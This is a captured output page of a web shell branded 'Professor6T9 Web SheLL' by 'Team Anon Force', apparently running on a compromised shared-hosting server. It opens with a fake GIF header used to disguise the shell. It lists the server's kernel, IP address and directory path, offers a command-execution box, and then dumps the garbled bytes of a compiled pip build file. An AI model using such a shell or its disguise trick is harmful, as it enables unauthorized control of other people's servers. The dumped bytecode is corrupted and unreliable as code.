GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python311
/
lib
/
python3.11
/
site-packages
/
pip
/
_vendor
/
pep517
/
__pycache__
[ HOME ]
Exec
Submit
File Name : build.cpython-311.pyc
� �Re� � �� � d Z ddlZddlZddlZddlZddlZddlmZ ddlm Z ddl mZmZ ddl mZmZ ej e� � Zd� Zd � Zd � Zd� Zdd�Z ej � � Ze� d d�� � e� dddd�� � e� dddd�� � e� ddd�� � d� Zedk r ee� � � � � dS dS )z%Build a project using PEP 517 hooks. � N� )�BuildEnvironment)�Pep517HookCaller)�tempdir�mkdir_p)�FileNotFoundError� toml_loadc � � ddh}|t | � � k s5d� |t | � � z �� � }t |� � �dS )z7 Ensure build system has the requisite fields. �requires� build-backendz"Missing required fields: {missing})�missingN)�set�format� ValueError)�system�required�messages ��/builddir/build/BUILDROOT/alt-python311-pip-21.3.1-3.el8.x86_64/opt/alt/python311/lib/python3.11/site-packages/pip/_vendor/pep517/build.py�validate_systemr s_ � � �O�,�H���F���#�#�6�=�=��S��[�[�(� >� � �� ��!�!�!� $�#� c �� � t j � | d� � }t j |d� � 5 }t |� � }ddd� � n# 1 swxY w Y |d S )zC Load the build system from a source dir (pyproject.toml). zpyproject.toml�rbNzbuild-system)�os�path�join�io�openr )� source_dir� pyproject�f�pyproject_datas r �load_systemr"